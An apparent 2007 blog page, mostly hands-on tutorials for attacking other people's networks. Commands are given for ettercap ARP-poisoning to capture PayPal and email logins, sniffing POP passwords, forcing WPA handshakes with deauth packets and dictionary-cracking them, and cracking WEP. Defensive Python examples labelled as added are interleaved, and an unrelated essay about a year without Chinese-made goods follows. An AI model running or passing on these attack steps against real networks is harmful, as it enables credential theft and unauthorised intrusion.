
Friday, July 06, 2007

How to crack SSL over a wireless network

Introduction

Do you think you’re safe if you type https:// before paypal.com? I hope you’ll think twice before logging in from a computer connected to a wireless network after reading this guide. Let’s start at the beginning. Let’s say you have an evil neighbour who wants your PayPal credentials. He buys himself a nice laptop with a wireless card and, if you are using WEP encryption, he cracks your WEP key (see the WEP cracking guide further down this page). After cracking the key he logs into your network. Maybe you always let him use your network because you thought it couldn’t do any harm to your computer. You aren’t sharing any folders, so what’s the problem? Well, in the next few steps I’m going to describe the problem.

The guide

1. Let’s assume your neighbour uses Linux to crack your WEP key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his Linux system. If you want to do this at home, I would recommend downloading BackTrack because it already has everything installed. Look at the WEP cracking guide I mentioned above for more info about BackTrack. If you want to install it on your own Linux distribution, download the source and install it with the following commands (replace "version" with the version you downloaded; the last step needs root):

$ tar -xzvf ettercap-version.tar.gz
$ cd ettercap-version
$ ./configure
$ make
$ make install

2. After installing, you need to uncomment two lines to enable SSL dissection. Open up a terminal window and type "nano /usr/local/etc/etter.conf", without the quotes (if you installed ettercap from your distribution’s package instead of from source, the file is /etc/etter.conf). Scroll down using your arrow keys until you find this piece of the file:

# if you use iptables:
# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
# redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

You need to uncomment the last two lines.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3. Press CTRL+O, press enter to save the file and then press CTRL+X.

4. Start Ettercap and click on Sniff > Unified Sniffing, type in your wireless interface and press OK.

5. Press CTRL+S to scan for hosts.

6. Go to MITM > ARP poisoning, select "Sniff remote connections" and press OK.

7. Now you (and your neighbour!) can start sniffing! Press Start > Start sniffing. Walk to another computer on your network and open up PayPal or any other site where you need to type in a username/password (Gmail, Hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap!

8. When you’re done, don’t just close Ettercap, but go to Start > Stop sniffing, and then go to MITM > Stop mitm attack(s).

But how does all this stuff work?

Look at the following diagram:

Normally, when you type in a password, host 1 (your computer) connects directly to host 2 (your modem or router). But if someone has launched Ettercap on your network, host 1 isn’t sending its passwords to host 2 but to the attacking host, the host that’s running Ettercap! The attacking host forwards everything to host 2, so host 1 doesn’t notice anything. Exactly the same happens with everything host 2 sends: host 2 doesn’t send packets directly to host 1, but first to the attacking host.
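The diagram above describes the attack; the defender’s view of the same event is a burst of ARP replies in which one MAC address suddenly claims the addresses of both the router and the victim. The Python below is an added example, not part of the original guide and not ettercap code: it runs the two classic arpwatch-style checks over a constructed list of ARP replies (the IPs, MACs and timestamps are made up).

```python
"""Added example: detect ARP cache poisoning from a list of ARP replies.

Not part of the original guide and not ettercap code. The replies below
are constructed to look like a small network with a router, two hosts
and an attacker that starts poisoning at t=2.0.
"""
from collections import defaultdict

# Constructed sample: (seconds since capture start, sender IP, sender MAC).
ROUTER, VICTIM, OTHER = "192.168.1.1", "192.168.1.10", "192.168.1.20"
SAMPLE_ARP_REPLIES = [
    (0.0, ROUTER, "00:11:22:33:44:01"),   # router announces itself (host 2)
    (0.5, VICTIM, "00:11:22:33:44:10"),   # host 1 in the diagram above
    (1.0, OTHER, "00:11:22:33:44:20"),
    (2.0, ROUTER, "00:11:22:33:44:EE"),   # attacker claims to be the router ...
    (2.0, VICTIM, "00:11:22:33:44:EE"),   # ... and the victim, at the same time
    (3.0, ROUTER, "00:11:22:33:44:EE"),   # poisoning is repeated periodically
]


def detect_arp_poisoning(replies):
    """Return {'changed': [(ts, ip, old_mac, new_mac), ...],
               'multi_ip': {mac: [ip, ...]}} for the given ARP replies.

    'changed' is arpwatch's "changed ethernet address" event: an IP that
    was bound to one MAC is suddenly announced with another.
    'multi_ip' lists every MAC that announced two or more IPs, which is
    what a man in the middle looks like when it impersonates both sides.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    changed = []
    for ts, ip, mac in replies:
        mac = mac.lower()          # MACs compare case-insensitively
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            changed.append((ts, ip, previous, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    multi_ip = {mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1}
    return {"changed": changed, "multi_ip": multi_ip}


def report(replies, gateway=ROUTER):
    """Human-readable alerts; the gateway's MAC changing is the strongest signal."""
    result = detect_arp_poisoning(replies)
    lines = []
    for ts, ip, old, new in result["changed"]:
        tag = "GATEWAY " if ip == gateway else ""
        lines.append(f"t={ts:.1f} {tag}{ip} moved from {old} to {new}")
    for mac, ips in result["multi_ip"].items():
        lines.append(f"{mac} claims {len(ips)} addresses: {', '.join(ips)}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_ARP_REPLIES):
        print(line)
```

On a real network you would feed it ARP replies from a capture (Wireshark’s arp display filter) or from a periodic dump of the ARP table. A single MAC with several IPs is not proof on its own (a router or a host with an alias looks the same), which is why the script also reports the router’s MAC changing. Mitigations: a static ARP entry for the gateway on important hosts, dynamic ARP inspection on managed switches, and, for the SSL part, remembering that ettercap can only read an HTTPS login by presenting its own certificate, so the browser’s certificate warning is the one signal the victim gets.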

How to get someone's email username/password

Did you know that everyone using your network (wireless and/or wired) can get the password of your e-mail account? Even if you have protected your network with a WEP key, your password is lying in the street. In this tutorial I’m not going to describe how to crack WEP (sorry folks, maybe next week), but I’m going to describe how to “steal” your own password using a computer in your network.

1. The first step is downloading Wireshark, the successor of Ethereal, from http://wireshark.org/download.html

2. Install Wireshark, and also install WinPcap (the installer will ask you if you want to install this; choose yes).

3. Start Wireshark. In the menu at the top select Capture > Options.

4. The Capture Options menu will pop up. In the interface field, choose the network interface you want to use.

5. Choose ‘Capture packets in promiscuous mode’ if you want to capture packets (e.g. to find a password) generated by a computer on the network other than your own.

6. Clear everything in the ‘Capture Filter’ field. We don’t need to use filters at the moment.

7. Don’t touch the rest of the settings. If you want to know what a setting does, hover the mouse over it for a little while.

8. Click Start to start capturing. On the computer where you want to ‘steal’ the password from (to make things easier the first time, just use the computer that’s running Wireshark, the computer you are working on at the moment), launch a mail application (Outlook, Thunderbird, etc.) and retrieve your new mail.

9. Go back to Wireshark and stop the capture by clicking Stop. The captured packets will appear. Click ‘Protocol’ to sort the packets by protocol.

10. Search for the protocol ‘POP’ to find your e-mail password. Look below for an example of the packets:

[Screenshot: Wireshark capture]

11. That’s all! You now have your e-mail account’s username and password! Now throw away your wireless network, or everyone can get your password while walking down your street!
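What the Wireshark steps show by hand is that POP3 on port 110 sends USER and PASS as plain text. As an added example (not code from the original post or from Wireshark), the Python below is the kind of check a network monitor runs to flag such cleartext logins: it scans constructed POP3 command lines grouped per TCP stream, reports who logged in where, and deliberately records only the length of the password rather than the password itself. The stream tuples, addresses and account names are all made up.

```python
"""Added example: flag cleartext POP3 logins in captured traffic.

Not part of the original post and not Wireshark code. The streams below are
constructed: client-to-server command lines grouped per TCP connection, keyed
by (client IP, server IP, server port).
"""
import re

POP3_USER = re.compile(r"^USER\s+(\S+)", re.IGNORECASE)
POP3_PASS = re.compile(r"^PASS\s+(.*)$", re.IGNORECASE)
POP3_PLAIN_PORT, POP3S_PORT = 110, 995

SAMPLE_STREAMS = {
    # plain POP3: everything below is readable by anyone on the network
    ("192.168.1.10", "203.0.113.5", 110): [
        "USER alice@example.com",
        "PASS hunter2-constructed",
        "STAT",
        "QUIT",
    ],
    # POP3 with STARTTLS (RFC 2595): the client upgrades before logging in,
    # so a sniffer sees only TLS records after STLS (placeholder line here)
    ("192.168.1.20", "203.0.113.5", 110): [
        "STLS",
        "<TLS handshake and encrypted application data>",
    ],
    # POP3 over TLS on port 995: nothing readable at all
    ("192.168.1.30", "203.0.113.5", POP3S_PORT): [
        "<TLS handshake and encrypted application data>",
    ],
}


def find_cleartext_logins(streams):
    """Return one finding per USER/PASS pair sent in the clear.

    The password itself is never stored: a monitoring tool that wrote
    captured passwords to its own log would just create a second leak.
    """
    findings = []
    for (client, server, port), lines in streams.items():
        if port != POP3_PLAIN_PORT:
            continue                      # 995 and other ports: not plain POP3
        user = None
        for line in lines:
            if line.strip().upper() == "STLS":
                break                     # remaining bytes are inside TLS
            m = POP3_USER.match(line)
            if m:
                user = m.group(1)
                continue
            m = POP3_PASS.match(line)
            if m and user is not None:
                findings.append({
                    "client": client,
                    "server": server,
                    "user": user,
                    "password_length": len(m.group(1)),
                })
                user = None
    return findings


if __name__ == "__main__":
    for f in find_cleartext_logins(SAMPLE_STREAMS):
        print(f"cleartext POP3 login {f['user']} from {f['client']} to {f['server']} "
              f"(password of {f['password_length']} chars exposed)")
```

A session that issues STLS (the POP3 STARTTLS command from RFC 2595) before USER is skipped, as is anything on port 995 (POP3 over TLS), because the credentials there travel inside TLS. That is also the fix: configure the mail client for POP3S on port 995 or for STARTTLS, and the sniffer in this tutorial sees only encrypted bytes. WEP does not help here, since everyone on the network shares the same key.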

Cracking WPA

1. Get yourself a good Linux distribution and download the newest aircrack-ng suite (www.aircrack-ng.org). Also download Kismet.

I would warmly recommend using back|track because it already has everything installed. Check the WEP cracking tutorial for information about the back|track installation.

2. Put your wireless card in monitor mode.

There are many different ways to do this. Some may not work with your drivers/card. I will explain one here: type ‘iwconfig’ in a terminal to see your wireless interfaces (mine is ath0). After that, type ‘iwconfig [interface] mode monitor’ to put your interface in monitor mode.

3. Start Kismet and wait a few seconds for it to find all networks in your area. First press ‘s’ and then ‘f’ to sort the networks, and navigate to a WPA-enabled network with your arrow keys. Press enter to get more information about the highlighted network. Do this to make sure that the network is protected with WPA encryption. Also remember which channel the network is running on.

4. Now start airodump, by opening a terminal window (you can use the one from the previous step) and typing:

airodump-ng -c [channel] -w wpa [interface]

5. Airodump will show all networks in the area on the channel you entered. Wait for ‘your’ network to show up and then wait for a client to connect to that access point. Clients are shown in the list below the list of APs.

6. Open a new terminal window and type:

aireplay-ng [interface] --deauth 25 -a [MAC address of the AP*] -h [MAC of the client]

* The MAC address: The number that airodump calls ‘BSSID’. It usually looks like this: 12:34:45:78:89:56

7. The deauth attack will kick the client off the network and force him to reconnect. During this reconnect airodump captures the so-called ‘handshake’. To crack the key, start a new terminal window. Keep airodump running. In the new terminal, type:

aircrack-ng -w [full path to dictionary file**] wpa-01.cap

** Search the web for a good dictionary file (try Google with the term “security wordlist”; please post good dictionaries in the comments). If you are using back|track, open a new terminal window and type (hard-disk install only!):

cd /pentest/password/dictionaries
gunzip wordlist.txt.Z

After unzipping, the “full path to dictionary file” is /pentest/password/dictionaries/wordlist.txt.

8. Now wait a long time. This can take hours if you aren’t lucky, and if the passphrase isn’t in the dictionary you’ll never find the key. If the key is found it shows up in aircrack. I’m currently figuring out how rainbow tables work. From what I read these rainbow tables can crack a WPA key in 10 minutes (wow!). Expect a tutorial about how this works within a few days.
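Why the dictionary step takes hours, and what to do about it, follows from how WPA-PSK turns the passphrase into a key. The Python below is an added example, not part of the original guide and not aircrack-ng’s code: it implements the IEEE 802.11i PSK derivation with Python’s hashlib, measures how many candidate passphrases one CPU core gets through per second, and audits a passphrase against a constructed five-word list. The wordlist, SSIDs and passphrases are made up, and the 20-character minimum is a policy choice, not something the standard requires.

```python
"""Added example: WPA-PSK passphrase audit and the cost of one dictionary guess.

Not part of the original guide and not aircrack-ng code. The wordlist,
SSIDs and passphrases are constructed; the 20-character minimum is a
policy choice, not a requirement of the standard.
"""
import hashlib
import time

# Constructed stand-in for the wordlist the guide feeds to aircrack-ng.
CONSTRUCTED_WORDLIST = {"password", "letmein", "wireless", "12345678", "qwertyui"}
MIN_LENGTH = 20


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK derivation: PBKDF2-HMAC-SHA1 with the SSID as salt,
    4096 iterations, 256-bit output. wpa_passphrase and aircrack-ng both
    compute exactly this for every candidate passphrase (802.11i Annex H
    publishes test vectors for it)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def audit_passphrase(passphrase: str, wordlist=CONSTRUCTED_WORDLIST,
                     min_length: int = MIN_LENGTH) -> list:
    """Return a list of problems; an empty list means the passphrase passes."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("not a valid WPA passphrase length (8-63 characters)")
    if passphrase.lower() in wordlist:
        problems.append("appears in wordlist: a dictionary attack finds it in one guess")
    if len(passphrase) < min_length:
        problems.append(f"shorter than {min_length} characters")
    return problems


def guesses_per_second(ssid: str = "constructed-ssid", samples: int = 50) -> float:
    """Measure how many PSK derivations one core does per second."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk(f"candidate-{i}", ssid)
    return samples / (time.perf_counter() - start)


def hours_to_exhaust(wordlist_size: int, rate: float) -> float:
    """Upper bound on the run time of a dictionary pass at a given guess rate."""
    return wordlist_size / rate / 3600.0


if __name__ == "__main__":
    rate = guesses_per_second()
    print(f"{rate:.0f} guesses/s on this core")
    print(f"a 10-million-word list takes up to {hours_to_exhaust(10_000_000, rate):.1f} h")
    for candidate in ("password", "correct horse battery staple 42"):
        print(candidate, "->", audit_passphrase(candidate) or "ok")
```

Each candidate costs 4096 HMAC-SHA1 iterations for each of the two PBKDF2 output blocks, so the rate you measure is in the low thousands per second per core and an offline guess is only cheap when the passphrase is in a list. The defender’s answer is a long, random passphrase that no list contains; and because the SSID is the salt, precomputed tables such as the rainbow tables mentioned above only cover the SSIDs they were built for.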

Cracking WEP: The Ultimate Guide

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hard disk or just boot the live CD (username: root, password: toor; don’t forget to start the GUI: type startx on the command line after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* To find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng --ivs -w capture [wireless interface]

5. When airodump finds the network you want to hack, it’ll show up. Note the BSSID (the access point’s MAC address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump before you have the WEP key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] --arpreplay -e [the SSID you found with airodump] -b [the BSSID you found with airodump] -h [the client’s MAC address]

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] --deauth 10 -a [the client’s MAC address]

3. Wait a long time, approximately 10 minutes. You should see the Data column in airodump rising. Once it reaches around 500k, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button yet!):

aireplay-ng [wireless interface] --arpreplay -e [the SSID you found with airodump] -b [the BSSID you found with airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button yet!):

aireplay-ng [wireless interface] --fakeauth -e [the SSID you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and, after it has started to fakeauth, press enter as quickly as possible in the arpreplay window.

4. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] --deauth 10 -a 01:02:03:04:05:06

5. Wait a long time, approximately 10 minutes. You should see the Data column in airodump rising. Once it reaches around 500k, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press enter after typing it in):

aireplay-ng [wireless interface] --fakeauth -e [the SSID you found with airodump] -a [the BSSID you found with airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press enter after typing it in):

aireplay-ng [wireless interface] --chopchop -e [the SSID you found with airodump] -b [the BSSID you found with airodump] -h 01:02:03:04:05:06

3. The chopchop attack starts reading packets. When it finds one, it’ll ask you whether to use it. Choose yes. Wait a few seconds/minutes and remember the filename it gives you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made by the chopchop attack in Ethereal (it’s located in the home folder).

5. Look through the captured file in Ethereal. Try to find the source IP and the destination IP and write those addresses down somewhere.

6. Open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found with airodump] 01:02:03:04:05:06 [the source IP] [the destination IP] arp.cap

7. In a new or in the same terminal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

8. Wait a long time, approximately 10 minutes. You should see the Data column in airodump rising. Once it reaches around 500k, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

aircrack-ng -n 64 capture-01.ivs (for 64-bit encryption; press enter after typing)

or

aircrack-ng -n 128 capture-01.ivs (for 128-bit encryption; press enter after typing)

If you don’t know how strong the encryption is, type both in different terminals and start a third terminal. Type in this command:

aircrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The key will automatically show up if found. Keep airodump running!
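The reason the cracking step works at all is WEP’s 24-bit IV: the same RC4 key stream comes back after a few thousand frames, and two frames encrypted under one key stream leak the XOR of their plaintexts. The Python below is an added example, not aircrack-ng’s code: it computes the birthday bound on IV reuse and demonstrates the key-stream reuse on two constructed frames with a textbook RC4 (the key, IV and frame contents are made up; the WEP integrity check value is omitted).

```python
"""Added example: why WEP's 24-bit IV makes the key stream reusable.

Not aircrack-ng code. Part one is the birthday bound on IV reuse; part two
encrypts two constructed frames with textbook RC4 under the same IV and key
(as WEP does: key stream = RC4(IV || key)) and shows what the reuse leaks.
The WEP integrity check value (ICV) is omitted.
"""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 possible IVs


def iv_collision_probability(frames: int) -> float:
    """P(at least one repeated IV) among `frames` randomly chosen IVs,
    birthday bound 1 - exp(-n(n-1)/(2N))."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


def frames_for_probability(p: float) -> int:
    """Smallest n whose collision probability reaches p (closed form of the bound)."""
    return math.ceil(0.5 + math.sqrt(0.25 - 2.0 * IV_SPACE * math.log(1.0 - p)))


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 key scheduling and PRGA (the cipher WEP uses)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || key (3-byte IV, 5- or 13-byte key)."""
    return xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


# Constructed frames, IV and 40-bit key.
IV = bytes([0x01, 0x02, 0x03])
KEY = b"\x12\x34\x56\x78\x9a"
FRAME_1 = b"GET /login HTTP/1.0"
FRAME_2 = b"POST /mail HTTP/1.0"


def keystream_reuse_demo():
    """Two frames under one IV: c1 ^ c2 = p1 ^ p2, and one known plaintext
    recovers the key stream and therefore the other frame."""
    c1 = wep_encrypt(IV, KEY, FRAME_1)
    c2 = wep_encrypt(IV, KEY, FRAME_2)
    leaked_xor = xor_bytes(c1, c2)
    keystream = xor_bytes(c1, FRAME_1)       # known plaintext, e.g. a predictable header
    recovered = xor_bytes(c2, keystream)
    return leaked_xor, recovered


if __name__ == "__main__":
    print(f"P(IV reuse) after 5000 frames: {iv_collision_probability(5000):.2f}")
    print(f"frames for 50% reuse probability: {frames_for_probability(0.5)}")
    print(f"frames until a sequential IV counter wraps: {IV_SPACE}")
    leaked, recovered = keystream_reuse_demo()
    print("c1 xor c2 == p1 xor p2:", leaked == xor_bytes(FRAME_1, FRAME_2))
    print("frame 2 recovered:", recovered)
```

With 5000 frames the chance of at least one repeated IV already passes 50%, and a card that picks IVs sequentially is guaranteed to wrap after 2^24 frames, which a busy access point does in hours. The statistical attacks on RC4 that aircrack-ng implements need far fewer frames than that, which is why the guide asks for only around 500k data packets. There is no configuration setting that fixes this; the mitigation is to replace WEP with WPA2.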

##### Disclaimer #####

I don’t think I have to mention that you need written permission from the owner of the network before you are allowed to start cracking his WEP key, or even before you are allowed to capture packets. Just try it with your own network. You’ll learn a lot about it. But never ever try it with a network other than your own.

##### Donations #####

I hope you enjoyed reading this guide. I did enjoy writing it, but I really don’t enjoy paying the bills for hosting and bandwidth. Please help me keep this site up and make a small PayPal donation to paypal@profit42.com.

Thanks.

Monday, July 02, 2007

A year without 'Made in China'

By Sara Bongiorni

BATON ROUGE, LA. – Last year, two days after Christmas, we kicked China out of the house. Not the country obviously, but bits of plastic, metal, and wood stamped with the words "Made in China." We kept what we already had, but stopped bringing any more in.

The banishment was no fault of China's. It had coated our lives with a cheerful veneer of toys, gadgets, and $10 children's shoes. Sometimes I worried about jobs sent overseas or nasty reports about human rights abuses, but price trumped virtue at our house. We couldn't resist what China was selling.

But on that dark Monday last year, a creeping unease washed over me as I sat on the sofa and surveyed the gloomy wreckage of the holiday. It wasn't until then that I noticed an irrefutable fact: China was taking over the place.

It stared back at me from the empty screen of the television. I spied it in the pile of tennis shoes by the door. It glowed in the lights on the Christmas tree and watched me in the eyes of a doll splayed on the floor. I slipped off the couch and did a quick inventory, sorting gifts into two stacks: China and non-China. The count came to China, 25, the world, 14. Christmas, I realized, had become a holiday made by the Chinese. Suddenly I'd had enough. I wanted China out.

Through tricks and persuasion I got my husband on board, and on Jan. 1 we launched a yearlong household embargo on Chinese imports. The idea wasn't to punish China, which would never feel the pinprick of our protest. And we didn't fool ourselves into thinking we'd bring back a single job to unplugged company towns in Ohio and Georgia. We pushed China out of our lives because we wanted to measure how far it had pushed in. We wanted to know what it would take in time, money, and aggravation to kick our China habit.

We hit the first rut in the road when I discovered our son's toes pressing against the ends of his tennis shoes. I wore myself out hunting for new ones. After two weeks I broke down and spent $60 on sneakers from Italy. I felt sick over the money; it seemed decadent for a pair of children's shoes. I got used to the feeling. Weeks later I shelled out $60 for Texas-made shoes for our toddler daughter.

We got hung up on lots of little things. I drove to half a dozen grocery stores in search of candles for my husband's birthday cake, eventually settling on a box of dusty leftovers I found in the kitchen. The junk drawer has been stuck shut since January. My husband found the part to fix it at Home Depot but left it on the shelf when he spotted the telltale "Made in China."

Mini crises erupted when our blender and television broke down. The television sputtered back to life without intervention, but it was a long, hot summer without smoothies. We killed four mice with old-fashioned snapping traps because the catch-and-release ones we prefer are made in China. Last summer at the beach my husband wore a pair of mismatched flip-flops my mother found in her garage. He'd run out of options at the drug store.

Navigating the toy aisle has been a wilting affair. In the spring, our 4-year-old son launched a countercampaign in support of "China things." He's been a good sport, but he's weary of Danish-made Legos, the only sure bet for birthday gifts for his friends. One morning in October he fell apart during a trip to Target when he developed a sudden lust for an electric purple pumpkin.

"It's too long without China," he wailed. He kept at me all day.

The next morning I drove him back so he could use his birthday money to buy the pumpkin for himself. I kept my fingers off the bills as he passed them to the checker.

My husband bemoans the Christmas gifts he can't buy because they were made in China. He plans to sew sleeping bags for the children himself. He can build wooden boats and guitars, but I fear he will meet his match with thread and needle.

"How hard can it be?" he scoffed.

The funny thing about China's ascent is that we, as a nation, could shut the whole thing down in a week. Jump-start a "Just Say No to Chinese Products Week," and the empire will collapse amid the chaos of overloaded cargo ships in Long Beach harbor. I doubt we could pull it off. Americans may be famously patriotic, but look closely, and you'll see who makes the flag magnets on their car bumpers. These days China delivers every major holiday, Fourth of July included.

I don't know what we will do after Dec. 31 when our family's embargo comes to its official end. China-free living has been a hassle. I have discovered for myself that China doesn't control every aspect of our daily lives, but if you take a close look at the underside of boxes in the toy department, I promise it will give you pause.

Our son knows where he stands on the matter. In the bathtub one evening he told me how happy he was that "the China season" was coming soon.

"When we can buy China things again, let's never stop," he said.

After a year without China I can tell you this: You can still live without it, but it's getting trickier and costlier by the day. And a decade from now I may not be brave enough to try it again.

• Sara Bongiorni is a freelance writer and is working on a book about her family's yearlong adventure in the global economy.